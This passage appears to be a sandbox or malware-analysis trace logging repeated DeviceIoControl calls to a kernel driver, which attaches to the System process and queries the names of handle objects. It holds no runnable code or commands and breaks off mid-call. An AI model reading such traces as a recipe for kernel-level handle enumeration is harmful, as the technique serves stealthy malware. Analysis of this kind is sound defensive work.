(in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x13c, lpOverlapped=0x0) returned 1 [0118.088] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.088] PsAcquireProcessExitSynchronization () returned 0x0 [0118.089] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.089] ObReferenceObjectByHandle (in: Handle=0xffffffff80000338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375ba90, HandleInformation=0x0) returned 0x0 [0118.089] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.089] PsReleaseProcessExitSynchronization () returned 0x2 [0118.089] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.089] ObQueryNameString (in: Object=0xfffffa800375ba90, ObjectNameInfo=0xfffffa8002870044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002870044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.089] ObfDereferenceObject (Object=0xfffffa800375ba90) returned 0x2 [0118.089] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.089] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.089] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.089] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.089] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.089] PsAcquireProcessExitSynchronization () returned 0x0 [0118.089] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.089] ObReferenceObjectByHandle (in: Handle=0xffffffff80000340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375b940, HandleInformation=0x0) returned 0x0 [0118.089] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.089] PsReleaseProcessExitSynchronization () returned 0x2 [0118.089] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.089] ObQueryNameString (in: Object=0xfffffa800375b940, ObjectNameInfo=0xfffffa8002871044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002871044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.089] ObfDereferenceObject (Object=0xfffffa800375b940) returned 0x1 [0118.090] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.417] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.417] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.417] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.417] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.417] PsAcquireProcessExitSynchronization () returned 0x0 [0118.417] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.417] ObReferenceObjectByHandle (in: Handle=0xffffffff80000344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375c980, HandleInformation=0x0) returned 0x0 [0118.418] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.418] PsReleaseProcessExitSynchronization () returned 0x2 [0118.418] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.418] ObQueryNameString (in: Object=0xfffffa800375c980, ObjectNameInfo=0xfffffa80028811c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028811c4, ReturnLength=0xfffff88005163550) returned 0x0 [0118.418] ObfDereferenceObject (Object=0xfffffa800375c980) returned 0x2 [0118.418] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.418] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.418] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.418] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0118.418] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.418] PsAcquireProcessExitSynchronization () returned 0x0 [0118.418] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.418] ObReferenceObjectByHandle (in: Handle=0xffffffff80000388, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800386ba30, HandleInformation=0x0) returned 0x0 [0118.418] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.418] PsReleaseProcessExitSynchronization () returned 0x2 [0118.418] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.418] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002879044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002879044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.418] ObfDereferenceObject (Object=0xfffffa800386ba30) returned 0x1 [0118.418] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.418] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.418] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.419] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0118.419] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.419] PsAcquireProcessExitSynchronization () returned 0x0 [0118.419] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.419] ObReferenceObjectByHandle (in: Handle=0xffffffff8000038c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800386ebf0, HandleInformation=0x0) returned 0x0 [0118.419] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.419] PsReleaseProcessExitSynchronization () returned 0x2 [0118.419] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.419] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800287a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800287a044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.419] ObfDereferenceObject (Object=0xfffffa800386ebf0) returned 0x1 [0118.419] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.419] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.419] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.419] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0118.419] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.419] PsAcquireProcessExitSynchronization () returned 0x0 [0118.419] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.419] ObReferenceObjectByHandle (in: Handle=0xffffffff80000390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800386e890, HandleInformation=0x0) returned 0x0 [0118.419] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.419] PsReleaseProcessExitSynchronization () returned 0x2 [0118.419] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.419] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800284c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800284c044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.419] ObfDereferenceObject (Object=0xfffffa800386e890) returned 0x1 [0118.419] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.420] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.420] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.420] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0118.420] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.420] PsAcquireProcessExitSynchronization () returned 0x0 [0118.420] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.420] ObReferenceObjectByHandle (in: Handle=0xffffffff80000394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003867f20, HandleInformation=0x0) returned 0x0 [0118.420] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.420] PsReleaseProcessExitSynchronization () returned 0x2 [0118.420] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.420] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800284d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800284d044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.420] ObfDereferenceObject (Object=0xfffffa8003867f20) returned 0x4 [0118.420] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.420] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.420] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.420] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0118.420] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.420] PsAcquireProcessExitSynchronization () returned 0x0 [0118.420] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.420] ObReferenceObjectByHandle (in: Handle=0xffffffff80000398, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003868880, HandleInformation=0x0) returned 0x0 [0118.420] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.420] PsReleaseProcessExitSynchronization () returned 0x2 [0118.421] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.421] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800284e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800284e044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.421] ObfDereferenceObject (Object=0xfffffa8003868880) returned 0x1 [0118.421] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.421] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.421] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.421] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0118.421] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.421] PsAcquireProcessExitSynchronization () returned 0x0 [0118.421] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.421] ObReferenceObjectByHandle (in: Handle=0xffffffff8000039c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003870b20, HandleInformation=0x0) returned 0x0 [0118.421] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.421] PsReleaseProcessExitSynchronization () returned 0x2 [0118.421] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.421] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800284f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800284f044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.421] ObfDereferenceObject (Object=0xfffffa8003870b20) returned 0x1 [0118.421] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.421] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.421] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.421] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0118.421] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.421] PsAcquireProcessExitSynchronization () returned 0x0 [0118.421] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.421] ObReferenceObjectByHandle (in: Handle=0xffffffff800003a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003870c70, HandleInformation=0x0) returned 0x0 [0118.421] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.422] PsReleaseProcessExitSynchronization () returned 0x2 [0118.422] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.422] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002853044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002853044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.422] ObfDereferenceObject (Object=0xfffffa8003870c70) returned 0x1 [0118.422] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.422] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.422] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.422] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.422] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.422] PsAcquireProcessExitSynchronization () returned 0x0 [0118.422] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.422] ObReferenceObjectByHandle (in: Handle=0xffffffff800003bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038d92b0, HandleInformation=0x0) returned 0x0 [0118.422] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.422] PsReleaseProcessExitSynchronization () returned 0x2 [0118.422] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.422] ObQueryNameString (in: Object=0xfffffa80038d92b0, ObjectNameInfo=0xfffffa8002854044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002854044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.422] ObfDereferenceObject (Object=0xfffffa80038d92b0) returned 0x2 [0118.422] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.422] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.422] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.422] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xde, lpOverlapped=0x0) returned 1 [0118.422] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.422] PsAcquireProcessExitSynchronization () returned 0x0 [0118.423] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.423] ObReferenceObjectByHandle (in: Handle=0xffffffff800003c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039047b0, HandleInformation=0x0) returned 0x0 [0118.423] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.423] PsReleaseProcessExitSynchronization () returned 0x2 [0118.423] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.423] ObQueryNameString (in: Object=0xfffffa80039047b0, ObjectNameInfo=0xfffffa8002855044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002855044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.423] ObfDereferenceObject (Object=0xfffffa80039047b0) returned 0x2 [0118.423] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.423] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.423] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.423] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0118.423] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.423] PsAcquireProcessExitSynchronization () returned 0x0 [0118.423] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.423] ObReferenceObjectByHandle (in: Handle=0xffffffff800003d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028e0b70, HandleInformation=0x0) returned 0x0 [0118.423] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.423] PsReleaseProcessExitSynchronization () returned 0x2 [0118.423] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.423] ObQueryNameString (in: Object=0xfffffa80028e0b70, ObjectNameInfo=0xfffffa8002856044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002856044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.423] ObfDereferenceObject (Object=0xfffffa80028e0b70) returned 0x1 [0118.423] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.424] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.424] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.424] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.424] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.424] PsAcquireProcessExitSynchronization () returned 0x0 [0118.424] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.424] ObReferenceObjectByHandle (in: Handle=0xffffffff800003d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034bdf20, HandleInformation=0x0) returned 0x0 [0118.424] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.426] PsReleaseProcessExitSynchronization () returned 0x2 [0118.426] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.426] ObQueryNameString (in: Object=0xfffffa80034bdf20, ObjectNameInfo=0xfffffa800286c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286c044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.426] ObfDereferenceObject (Object=0xfffffa80034bdf20) returned 0x2 [0118.426] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.426] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.426] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.426] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0118.426] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.426] PsAcquireProcessExitSynchronization () returned 0x0 [0118.426] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.427] ObReferenceObjectByHandle (in: Handle=0xffffffff800003dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e64f20, HandleInformation=0x0) returned 0x0 [0118.427] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.427] PsReleaseProcessExitSynchronization () returned 0x2 [0118.427] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.427] ObQueryNameString (in: Object=0xfffffa8002e64f20, ObjectNameInfo=0xfffffa800286d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.427] ObfDereferenceObject (Object=0xfffffa8002e64f20) returned 0x1 [0118.427] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.427] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.427] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.427] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0118.427] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.427] PsAcquireProcessExitSynchronization () returned 0x0 [0118.427] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.427] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: 